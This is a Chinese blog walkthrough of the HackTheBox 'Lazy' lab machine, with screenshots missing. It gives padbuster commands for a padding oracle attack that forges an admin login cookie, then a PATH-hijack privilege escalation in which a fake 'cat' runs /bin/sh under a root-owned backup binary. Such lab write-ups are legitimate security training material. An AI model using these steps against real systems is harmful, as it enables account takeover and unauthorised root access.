oscp——htb——Lazy

0x00 前言

在这里插入图片描述

0x01 信息收集

在这里插入图片描述

0x02 Web——USershell

首先注册,然后登录,这个时候抓取数据包,看到有一个auto,将auto改为aaa,可以看到出现,Invalid padding,这里应该存在Padding Oracle攻击。
在这里插入图片描述

然后使用padbuster

padbuster http://10.10.10.18/login.php 47d5OoBRMf0o481c8HyYDeKg5Ln7QxLF 8 -cookies auth=47d5OoBRMf0o481c8HyYDeKg5Ln7QxLF -encoding 0

在这里插入图片描述
我这边的网络比较慢,一直不出结果

padbuster http://10.10.10.18/login/php 47d5OoBRMf0o481c8HyYDeKg5Ln7QxLF 8 -cookies auth=47d5OoBRMf0o481c8HyYDeKg5Ln7QxLF -encoding 0 plaintext user=admin 

在这里插入图片描述
在这里获取到一个PRIVATE KEY

http://192.168.203.225:1080/mysshkeywithnamemitsos

直接ssh连进去就行
在这里插入图片描述
进去之后就可以获得以下user flag

0x03 Usershell——Rootshell

ls 一下,看到一个backup
在这里插入图片描述
这里标红是指有root权限的。

cat以下,没有发现。
执行一下:应该是调用了cat等命令吧
在这里插入图片描述
strings可以看到调用了cat的命令
在这里插入图片描述
这里需要进行环境变量覆盖一下

echo "/bin/sh">cat 
chmod 777 cat
export PATH=/tmp:$PATH

最后即可拿到shell

参考文章:https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-lazy/

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页